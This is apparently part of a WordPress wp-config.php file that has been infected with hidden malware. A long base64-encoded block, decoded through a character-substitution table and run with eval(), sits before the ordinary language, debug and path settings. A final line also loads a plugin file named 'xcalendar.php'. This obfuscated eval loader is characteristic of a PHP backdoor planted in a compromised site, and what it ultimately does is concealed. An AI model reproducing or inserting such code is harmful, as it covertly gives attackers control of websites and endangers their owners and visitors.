bjJLU0JVZUdXeFFHcEpvSXdySGdhODdWdDg3VnQ4N1Z0Jy4KJzg3VnQ4N1Z0OHZZRGM3VnQ4N1Z0ODdWdDg3VnQ4N1Z0ODdWdDg3VkVyZUF0YUswNWRLU1R6Y1Y1WW9GNGo2SXB1b3lmTWUxWThLMDRBSzA1ZGNTVTJsMScuCic4QW1HZmg2U3dBYzFZOFpWWThsMTJyN1Y5VGkxRVNtSUJ6ZTEybFZBdDg3VnQ4N1Z0ODdWdDg3VnQ4N1Z0ODdWdDh2WURjN1Z0ODdWdDg3VnQ4N1Z0ODdWdDg3VnQ4N1Z0Jy4KJzg3VnQ4Z1M0R21JWWFtMGx1ZVM0aEtqV1liVkpoS1VUeTZJQldRMDNXbUlnYTNGbERvMDNKZUc0dUtTZkQ2VnR4N1Y3UjdBdHg3VjVZb0Y0ajZJcHVveWZNZTEyTicuCic3U2x6UURiV2I5SlJLMGdhYzEycmtZRGM3VnQ4N1Z0ODdWdDg3VnQ4N1Z0ODdWdDg3VkVUSGdhODdWdDg3VnQ4N1Z0ODdWdDg3VnQ4dWdEYycuCic3VnQ4N1Z0ODdWdDg3VnQ4dWdEYzdWdDg3VnQ4N1Z0ODdWdDhlSUJ6ZWdEYzdWdDg3VnQ4N1Z0ODdWdDh2WURjN1Z0ODdWdDg3VnQ4N1Z0ODdWdDg3VjV6YlNUZG1JYicuCidXUTBFSmJTODhpMXQySzA1Ukt5ZmplNFRZbVE1YTdWbjg3QXFBN1ZuOEswNEFLMDVkY1NVMmwxOEFtR2ZoNlN3QWMxWThaVlk4bDEyJy4KJzhPQXRBUWQ3OE9BRU1lSHdhM1NwSm9JdzhPQUVoS1VURmVRNTdvMGxEY1YycmtZRGNIZ2E4N1Z0ODdWdDg3VnQ4N1Z0ODdWdDg2SW04Y1Nlcm9TNHVlUUpySzA1emNWNXpiU1QnLgonZG1JYldRMEVKYlM4cmNnRGM3VnQ4N1Z0ODdWdDg3VnQ4N1Z0ODdGTmxWQXQ4N1Z0ODdWdDg3VnQ4N1Z0ODcnLgonVnQ4N1Z0OGdTNEdtSVlhbTBsdWVTNGhLaldZYlZKaEtVVHk2SUJXUTAzV21JZ2EzRmxEbzAzSicuCidlRzR1S1NmRDZWMk43U2x6UURiV2I5SlJLMGdhYzEycmtZRGM3VnQ4N1Z0ODdWdDg3VnQ4N1Z0ODdGRGxWQXQ4N1Z0ODdWdDg3VnQ4N0ZEJy4KJ2xWQXQ4N1Z0ODdWdDh1Z0RjN1Z0ODdGRGxWOERjN1Z0ODdTZVVveWxENklUeDdTbHpRMGJkNlE1Sm15QldRR2xhZScuCidJbExjVjJsVkF0ODdWRUNIZ2E4N1Z0ODdWdDg3U1d5N1ZKemJGM05lSW5hbTBsdTVHNERnR1RNb0lUeHcwNVJLeScuCidmamUxOHJjMXRKaTF0WWNnRGM3VnQ4N1Z0ODdWRUNIZ2E4N1Z0ODdWdDg3VnQ4N1ZFZGVRNVVLeW44NEYzVWVYTmxWQXQ4N1Z0ODdWdDh1Jy4KJ2dEYzdWdDg3VnQ4N1ZFV29GbFdIZ2E4N1Z0ODdWdDg3Rk5sVkF0ODdWdDg3VnQ4N1Z0ODdGM1diJy4KJ0Y0ZG9BRVNtSUJ6ZVhObFZBdDg3VnQ4N1Z0OHVnRGM3VnQ4N0ZEbFY4RGM3VnQ4N1NlUkt5NEptRzg4Y1Y1dWdEVGkxRFdmN1NmejdWNUxlUTJUaUE1R21JQlVlMTJsVkF0OCcuCic3VkVDSGdhODdWdDg3VnQ4N1Y1Mm1RNUo3SEQ4M0ZlSm9GNFdrWURjN1Z0ODdWdDg3VnQyZVMnLgonZkRtNFRMZVEyOGkxdDI2RzRwa1lEYzdWdDg3RkRsVjhEYzdWdDg3U1d5N1Y4SjNTNUpiUzlySGdhODdWdDh2WURjN1Z0ODdWdDg3VicuCidFeW8wM1dtSWxhN1Y4MlFVRWl3VWc4bVFaODNTTVd2WEQrM0ZlSm9GNFdjZ0RjN1Z0ODdWdDg3VkVDSGdhODdWdDg3VnQ4N1Z0ODdWdDJlU2YnLgonRG0xdFQ3VjVHbUlCVWVYTmxWQXQ4N1Z0ODdWdDg3VnQ4N1Y1Mm1RNUpRR01XdjF0VDdWNUxlUTJDSGdhODdWdDg3VnQ4N0ZEbFZBdDg3VkVUSGdhbFZBdDg3VnQyZVNmRG0xdCcuCidUNzlFVW9qbFdLeVdKb1NXUGUxSmhLVVQyZUlsZHZRRURjUzNKS0d3R2xmVDJlSWxSZVMnLgond2EzUzVKYlM5ck9WdDJlU2ZEbTRUTGVRMnJjWE5sVjhEYzdWdDg3U1d5N1ZKckswbFdiVjgyZVNmRG00TmptSU5qUTEyODMnLgonQW04M1NselFHZlViUzhUaTE1Mm1RNUpJZGJKNmRiYmNnRGM3VnQ4N0ZObFZBdDg3VnQ4N1Z0ODZJbThjVjUybVE1Jy4KJ0pJZGJKM1VEOGlYRDgzRzJqY2dEYzdWdDg3VnQ4N1ZFQ0hnYTg3VnQ4N1Z0ODdWdDg3VnQyNjF0VDc5ZmRLeWZwY3REYzdWdDg3VicuCid0ODdWdDg3VnQ4N1Z0ODdWYlliQUs4aVhuOGdGRWFLRmVXS2pscm9HbmFjMVlsVkF0ODdWdDg3VnQ4N1Z0ODdWdDg3VnRqSzBtajdIRCs3VktCT2h0Jy4KJ01aQUtOSGdhODdWdDg3VnQ4N1Z0ODdWdDg3VnQ4M0dmTDNkdFRpQXQyZVNmRG00TmptSU5qUTFZbFZBdDg3VnQ4N1Z0ODdWdDg3VjJDSGdhODdWJy4KJ3Q4N1Z0ODdWdDg3VkVXbUdKUjc5RXplUTNybUlCcnZ5d2EzUzJya1lEYzdWdDg3VnQ4N1Z0ODdWdDhlUUpyYkhObFZBdDg3VnQ4N1Z0OHVnRGM3VnQ4N1Z0ODdWJy4KJ0VXb0ZsVzZJbThjVjUybVE1SklkYkozVUQ4aVhEODNHd2pjZ0RjN1Z0ODdWdDg3VkVDJy4KJ0hnYTg3VnQ4N1Z0ODdWdDg3VkVXYnlmTmNWNTJtUTVKSWRiMjNVRHJrWURjN1Z0ODdWdDg3VkVUSGdhODdWdDg3VnQ4N1M0TktHNHJlQScuCid0YTNTNUpiU2ZvM0c5alExdFRpMXRqS1NCVWVHV3gzZDJsVkF0ODdWdDg3VnQ4dllEYzdWdDg3VnQ4N1Z0ODdWJy4KJ3Q4NkltYTNTNUpiU2ZvMzBsSjNVRDhpWEQ4M0dmMmVWS3JIZ2E4N1Z0ODdWdDg3VnQ4N1YnLgonRUNIZ2E4N1Z0ODdWdDg3VnQ4N1Z0ODdWdDhtMGx1S1NCVWVHV3hRR2YyZVY4MmVTZkRtNE5qS1ZiYk9WdDJlU2ZEbTROamVWYmJjWE5sVkF0ODdWdDg3VnQ4N1Z0ODdGJy4KJ0RsVkF0ODdWdDg3VnQ4N1Z0ODdTNE5LRzRyZUE4MmVTZkRtNE5qS0c5alExdFRpMXRqS3k0TTNkMmxWQXQ4N1Z0ODdWdDg3VnQ4N0ZObFZBJy4KJ3Q4N1Z0ODdWdDg3VnQ4N1Z0ODdWRWhLVVRZb0Y0ajZJcHVLeTRNY1Y1Mm1RNUpJZGJZM1VEcmtZRGM3VnQ4N1Z0ODdWdDg3VnQ4dWdEYzdWdDg3VnQ4NycuCidWRVRIZ2E4N1Z0ODdWdDg3UzRoNlNxODNTNUpiU2ZvM0dmTDNVRENIZ2E4N1Z0ODdWdDg3UzRuNlFnYScuCidjWE5sVkF0ODdWRVRIZ2FsVkF0ODdWRWhLVVRZb0Y0ajZJcHVvU1RKZVY4cmtZRGN1Zz09JzsKJHBnYndjYWVyID0gQXJyYXkoJzEnPT4nUycsICcwJz0+JzMnLCAnMyc9PidKJywgJzInPT4naycsICc1Jz0+J1InLCAnNCc9PidWJywgJzcnPT4nSScsICc2Jz0+J2EnLCAnOSc9PidFJywgJzgnPT4nZycsICdBJz0+J2knLCAnQyc9Pic3JywgJ0InPT4neCcsICdFJz0+J0InLCAnRCc9PicwJywgJ0cnPT4nMicsICdGJz0+J0gnLCAnSSc9PidXJywgJ0gnPT4nRCcsICdLJz0+J2MnLCAnSic9PidoJywgJ00nPT4ndCcsICdMJz0+J3InLCAnTyc9PidMJywgJ04nPT4ncycsICdRJz0+J1gnLCAnUCc9Pic2JywgJ1MnPT4nRycsICdSJz0+J3YnLCAnVSc9PicxJywgJ1QnPT4nOScsICdXJz0+J2wnLCAnVic9PidDJywgJ1knPT4ndycsICdYJz0+J1QnLCAnWic9PidNJywgJ2EnPT4nbycsICdjJz0+J0snLCAnYic9PidkJywgJ2UnPT4nWicsICdkJz0+J3knLCAnZyc9PidRJywgJ2YnPT4nRicsICdpJz0+J1AnLCAnaCc9PidqJywgJ2snPT4nTycsICdqJz0+J24nLCAnbSc9PidZJywgJ2wnPT4nTicsICdvJz0+J2InLCAnbic9Pic0JywgJ3EnPT4nOCcsICdwJz0+JzUnLCAncyc9PidxJywgJ3InPT4ncCcsICd1Jz0+J2YnLCAndCc9PidBJywgJ3cnPT4nVScsICd2Jz0+J2UnLCAneSc9PidtJywgJ3gnPT4ndScsICd6Jz0+J3onKTsKZXZhbChrZmVvendya25sKCRqbnhsbmZ1Y2diLCAkcGdid2NhZXIpKTsKfQ==")); /*English. * * Change this to localize WordPress. A corresponding MO file for the chosen * language must be installed to wp-content/languages. For example, install * de_DE.mo to wp-content/languages and set WPLANG to 'de_DE' to enable German * language support. */ define('WPLANG', ''); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. */ define('WP_DEBUG', false); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php'); require_once(ABSPATH.'wp-content/plugins/xcalendar/xcalendar.php');